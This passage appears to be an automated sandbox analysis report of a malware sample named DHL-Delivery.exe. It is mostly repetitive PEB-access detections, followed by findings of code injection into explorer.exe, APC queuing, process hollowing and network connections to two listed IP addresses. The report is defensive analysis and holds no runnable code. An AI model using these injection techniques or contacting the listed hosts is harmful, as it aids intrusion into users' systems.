    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16AFF3 mov eax, dword ptr fs:[00000030h]6_2_1E16AFF3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E173FF0 mov eax, dword ptr fs:[00000030h]6_2_1E173FF0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E173FF0 mov eax, dword ptr fs:[00000030h]6_2_1E173FF0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A2FF5 mov eax, dword ptr fs:[00000030h]6_2_1E1A2FF5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A2FF5 mov eax, dword ptr fs:[00000030h]6_2_1E1A2FF5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100FE0 mov eax, dword ptr fs:[00000030h]6_2_1E100FE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100FE0 mov eax, dword ptr fs:[00000030h]6_2_1E100FE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100FE0 mov eax, dword ptr fs:[00000030h]6_2_1E100FE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100FE0 mov eax, dword ptr fs:[00000030h]6_2_1E100FE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100FE0 mov eax, dword ptr fs:[00000030h]6_2_1E100FE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100FE0 mov eax, dword ptr fs:[00000030h]6_2_1E100FE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E159FE4 mov eax, dword ptr fs:[00000030h]6_2_1E159FE4
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E159FE4 mov eax, dword ptr fs:[00000030h]6_2_1E159FE4
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16AFE4 mov eax, dword ptr fs:[00000030h]6_2_1E16AFE4
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16CFE2 mov eax, dword ptr fs:[00000030h]6_2_1E16CFE2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16CFE2 mov eax, dword ptr fs:[00000030h]6_2_1E16CFE2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16CFE2 mov eax, dword ptr fs:[00000030h]6_2_1E16CFE2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16BC10 mov eax, dword ptr fs:[00000030h]6_2_1E16BC10
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A3C15 mov eax, dword ptr fs:[00000030h]6_2_1E1A3C15
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C0B mov eax, dword ptr fs:[00000030h]6_2_1E199C0B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D9C25 mov ecx, dword ptr fs:[00000030h]6_2_1E0D9C25
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15EC3E mov eax, dword ptr fs:[00000030h]6_2_1E15EC3E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15EC3E mov eax, dword ptr fs:[00000030h]6_2_1E15EC3E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15EC3E mov eax, dword ptr fs:[00000030h]6_2_1E15EC3E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B1C36 mov eax, dword ptr fs:[00000030h]6_2_1E1B1C36
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B2C35 mov eax, dword ptr fs:[00000030h]6_2_1E1B2C35
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E11EC22 mov eax, dword ptr fs:[00000030h]6_2_1E11EC22
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E11EC22 mov eax, dword ptr fs:[00000030h]6_2_1E11EC22
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E169C23 mov eax, dword ptr fs:[00000030h]6_2_1E169C23
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101C55 mov eax, dword ptr fs:[00000030h]6_2_1E101C55
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101C55 mov eax, dword ptr fs:[00000030h]6_2_1E101C55
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101C55 mov eax, dword ptr fs:[00000030h]6_2_1E101C55
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101C55 mov eax, dword ptr fs:[00000030h]6_2_1E101C55
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101C55 mov eax, dword ptr fs:[00000030h]6_2_1E101C55
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101C55 mov eax, dword ptr fs:[00000030h]6_2_1E101C55
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101C55 mov eax, dword ptr fs:[00000030h]6_2_1E101C55
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A6C49 mov eax, dword ptr fs:[00000030h]6_2_1E1A6C49
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E166C4F mov eax, dword ptr fs:[00000030h]6_2_1E166C4F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E7C52 mov eax, dword ptr fs:[00000030h]6_2_1E0E7C52
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E7C52 mov eax, dword ptr fs:[00000030h]6_2_1E0E7C52
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E7C52 mov eax, dword ptr fs:[00000030h]6_2_1E0E7C52
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E7C52 mov eax, dword ptr fs:[00000030h]6_2_1E0E7C52
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E7C52 mov eax, dword ptr fs:[00000030h]6_2_1E0E7C52
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E7C52 mov eax, dword ptr fs:[00000030h]6_2_1E0E7C52
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FDC50 mov eax, dword ptr fs:[00000030h]6_2_1E0FDC50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FDC50 mov eax, dword ptr fs:[00000030h]6_2_1E0FDC50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FDC50 mov eax, dword ptr fs:[00000030h]6_2_1E0FDC50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FDC50 mov eax, dword ptr fs:[00000030h]6_2_1E0FDC50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FDC50 mov eax, dword ptr fs:[00000030h]6_2_1E0FDC50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106C7B mov eax, dword ptr fs:[00000030h]6_2_1E106C7B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106C7B mov eax, dword ptr fs:[00000030h]6_2_1E106C7B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106C7B mov eax, dword ptr fs:[00000030h]6_2_1E106C7B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E115C64 mov eax, dword ptr fs:[00000030h]6_2_1E115C64
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15BC68 mov eax, dword ptr fs:[00000030h]6_2_1E15BC68
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15BC68 mov eax, dword ptr fs:[00000030h]6_2_1E15BC68
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E108C99 mov eax, dword ptr fs:[00000030h]6_2_1E108C99
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E108C99 mov eax, dword ptr fs:[00000030h]6_2_1E108C99
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E169C98 mov eax, dword ptr fs:[00000030h]6_2_1E169C98
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ACC95 mov eax, dword ptr fs:[00000030h]6_2_1E1ACC95
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ACC95 mov eax, dword ptr fs:[00000030h]6_2_1E1ACC95
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B1C94 mov eax, dword ptr fs:[00000030h]6_2_1E1B1C94
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E161C80 mov ecx, dword ptr fs:[00000030h]6_2_1E161C80
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E165C8C mov eax, dword ptr fs:[00000030h]6_2_1E165C8C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E184C87 mov eax, dword ptr fs:[00000030h]6_2_1E184C87
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10ACB0 mov eax, dword ptr fs:[00000030h]6_2_1E10ACB0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10ACB0 mov eax, dword ptr fs:[00000030h]6_2_1E10ACB0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10ACB0 mov eax, dword ptr fs:[00000030h]6_2_1E10ACB0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DACAF mov eax, dword ptr fs:[00000030h]6_2_1E0DACAF
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DACAF mov eax, dword ptr fs:[00000030h]6_2_1E0DACAF
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DACAF mov eax, dword ptr fs:[00000030h]6_2_1E0DACAF
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15DCA1 mov eax, dword ptr fs:[00000030h]6_2_1E15DCA1
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E159CA0 mov eax, dword ptr fs:[00000030h]6_2_1E159CA0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E172CA0 mov eax, dword ptr fs:[00000030h]6_2_1E172CA0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E111CD0 mov eax, dword ptr fs:[00000030h]6_2_1E111CD0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E111CD0 mov eax, dword ptr fs:[00000030h]6_2_1E111CD0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E111CD0 mov eax, dword ptr fs:[00000030h]6_2_1E111CD0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E111CD0 mov eax, dword ptr fs:[00000030h]6_2_1E111CD0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D9CDD mov eax, dword ptr fs:[00000030h]6_2_1E0D9CDD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D9CDD mov eax, dword ptr fs:[00000030h]6_2_1E0D9CDD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D9CDD mov eax, dword ptr fs:[00000030h]6_2_1E0D9CDD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E17DCC0 mov eax, dword ptr fs:[00000030h]6_2_1E17DCC0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E168CC9 mov eax, dword ptr fs:[00000030h]6_2_1E168CC9
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E166CF0 mov eax, dword ptr fs:[00000030h]6_2_1E166CF0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E105CF9 mov eax, dword ptr fs:[00000030h]6_2_1E105CF9
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E105CF9 mov eax, dword ptr fs:[00000030h]6_2_1E105CF9
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B1CF2 mov eax, dword ptr fs:[00000030h]6_2_1E1B1CF2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DBCE6 mov eax, dword ptr fs:[00000030h]6_2_1E0DBCE6
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E190CF7 mov eax, dword ptr fs:[00000030h]6_2_1E190CF7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E197CE5 mov eax, dword ptr fs:[00000030h]6_2_1E197CE5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E165D15 mov esi, dword ptr fs:[00000030h]6_2_1E165D15
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E165D15 mov eax, dword ptr fs:[00000030h]6_2_1E165D15
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E165D15 mov eax, dword ptr fs:[00000030h]6_2_1E165D15
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DDD05 mov eax, dword ptr fs:[00000030h]6_2_1E0DDD05
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15ED1D mov eax, dword ptr fs:[00000030h]6_2_1E15ED1D
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15ED1D mov ecx, dword ptr fs:[00000030h]6_2_1E15ED1D
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E169D04 mov eax, dword ptr fs:[00000030h]6_2_1E169D04
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EDD13 mov eax, dword ptr fs:[00000030h]6_2_1E0EDD13
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EDD13 mov eax, dword ptr fs:[00000030h]6_2_1E0EDD13
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EDD13 mov eax, dword ptr fs:[00000030h]6_2_1E0EDD13
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FED10 mov eax, dword ptr fs:[00000030h]6_2_1E0FED10
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104D30 mov eax, dword ptr fs:[00000030h]6_2_1E104D30
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104D30 mov eax, dword ptr fs:[00000030h]6_2_1E104D30
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A6D3C mov eax, dword ptr fs:[00000030h]6_2_1E1A6D3C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E115D20 mov eax, dword ptr fs:[00000030h]6_2_1E115D20
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E172D20 mov eax, dword ptr fs:[00000030h]6_2_1E172D20
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E172D20 mov eax, dword ptr fs:[00000030h]6_2_1E172D20
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B1D53 mov eax, dword ptr fs:[00000030h]6_2_1E1B1D53
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DAD40 mov eax, dword ptr fs:[00000030h]6_2_1E0DAD40
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DAD40 mov eax, dword ptr fs:[00000030h]6_2_1E0DAD40
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E173D40 mov eax, dword ptr fs:[00000030h]6_2_1E173D40
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E173D40 mov eax, dword ptr fs:[00000030h]6_2_1E173D40
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E1D64 mov eax, dword ptr fs:[00000030h]6_2_1E0E1D64
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EFD60 mov eax, dword ptr fs:[00000030h]6_2_1E0EFD60
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EFD60 mov eax, dword ptr fs:[00000030h]6_2_1E0EFD60
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov ecx, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov ecx, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov ecx, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov ecx, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E197D66 mov eax, dword ptr fs:[00000030h]6_2_1E197D66
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19AD92 mov eax, dword ptr fs:[00000030h]6_2_1E19AD92
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19AD92 mov eax, dword ptr fs:[00000030h]6_2_1E19AD92
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19AD92 mov eax, dword ptr fs:[00000030h]6_2_1E19AD92
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19AD92 mov eax, dword ptr fs:[00000030h]6_2_1E19AD92
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19AD92 mov eax, dword ptr fs:[00000030h]6_2_1E19AD92
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19AD92 mov eax, dword ptr fs:[00000030h]6_2_1E19AD92
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19AD92 mov eax, dword ptr fs:[00000030h]6_2_1E19AD92
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101D9F mov eax, dword ptr fs:[00000030h]6_2_1E101D9F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101D9F mov eax, dword ptr fs:[00000030h]6_2_1E101D9F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101D9F mov eax, dword ptr fs:[00000030h]6_2_1E101D9F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101D9F mov eax, dword ptr fs:[00000030h]6_2_1E101D9F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101D9F mov eax, dword ptr fs:[00000030h]6_2_1E101D9F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E169D99 mov eax, dword ptr fs:[00000030h]6_2_1E169D99
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15ADB7 mov eax, dword ptr fs:[00000030h]6_2_1E15ADB7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100DB7 mov eax, dword ptr fs:[00000030h]6_2_1E100DB7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100DB7 mov eax, dword ptr fs:[00000030h]6_2_1E100DB7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100DB7 mov eax, dword ptr fs:[00000030h]6_2_1E100DB7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B1DB4 mov eax, dword ptr fs:[00000030h]6_2_1E1B1DB4
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E190DA1 mov eax, dword ptr fs:[00000030h]6_2_1E190DA1
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FFDC6 mov eax, dword ptr fs:[00000030h]6_2_1E0FFDC6
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D7DC7 mov eax, dword ptr fs:[00000030h]6_2_1E0D7DC7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D7DC7 mov eax, dword ptr fs:[00000030h]6_2_1E0D7DC7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D7DC7 mov eax, dword ptr fs:[00000030h]6_2_1E0D7DC7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E197DD2 mov eax, dword ptr fs:[00000030h]6_2_1E197DD2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E11FDC3 mov eax, dword ptr fs:[00000030h]6_2_1E11FDC3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E157DC0 mov eax, dword ptr fs:[00000030h]6_2_1E157DC0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E157DC0 mov eax, dword ptr fs:[00000030h]6_2_1E157DC0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E157DC0 mov eax, dword ptr fs:[00000030h]6_2_1E157DC0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E157DC0 mov eax, dword ptr fs:[00000030h]6_2_1E157DC0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E18BDC0 mov eax, dword ptr fs:[00000030h]6_2_1E18BDC0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E115DF2 mov eax, dword ptr fs:[00000030h]6_2_1E115DF2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E115DF2 mov eax, dword ptr fs:[00000030h]6_2_1E115DF2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E174DF3 mov eax, dword ptr fs:[00000030h]6_2_1E174DF3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E11ADF5 mov eax, dword ptr fs:[00000030h]6_2_1E11ADF5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106DE3 mov eax, dword ptr fs:[00000030h]6_2_1E106DE3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106DE3 mov eax, dword ptr fs:[00000030h]6_2_1E106DE3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106DE3 mov eax, dword ptr fs:[00000030h]6_2_1E106DE3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106DE3 mov eax, dword ptr fs:[00000030h]6_2_1E106DE3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106DE3 mov eax, dword ptr fs:[00000030h]6_2_1E106DE3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106DE3 mov eax, dword ptr fs:[00000030h]6_2_1E106DE3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106DE3 mov eax, dword ptr fs:[00000030h]6_2_1E106DE3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E112DE7 mov eax, dword ptr fs:[00000030h]6_2_1E112DE7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E112DE7 mov eax, dword ptr fs:[00000030h]6_2_1E112DE7
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Process token adjusted: Debug
    Source: C:\Windows\SysWOW64\cmmon32.exe Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion:

    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
    Source: C:\Windows\explorer.exe Network Connect: 198.54.126.238 80
    Maps a DLL or memory area into another process
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
    Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: unknown protection: read write
    Modifies the context of a thread in another process (thread injection)
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Thread register set: target process: 4472
    Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 4472
    Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 5372
    Queues an APC in another process (thread injection)
    Source: C:\Users\user\Desktop\DHL-Delivery.exe Thread APC queued: target process: C:\Windows\explorer.exe
    Sample uses process hollowing technique
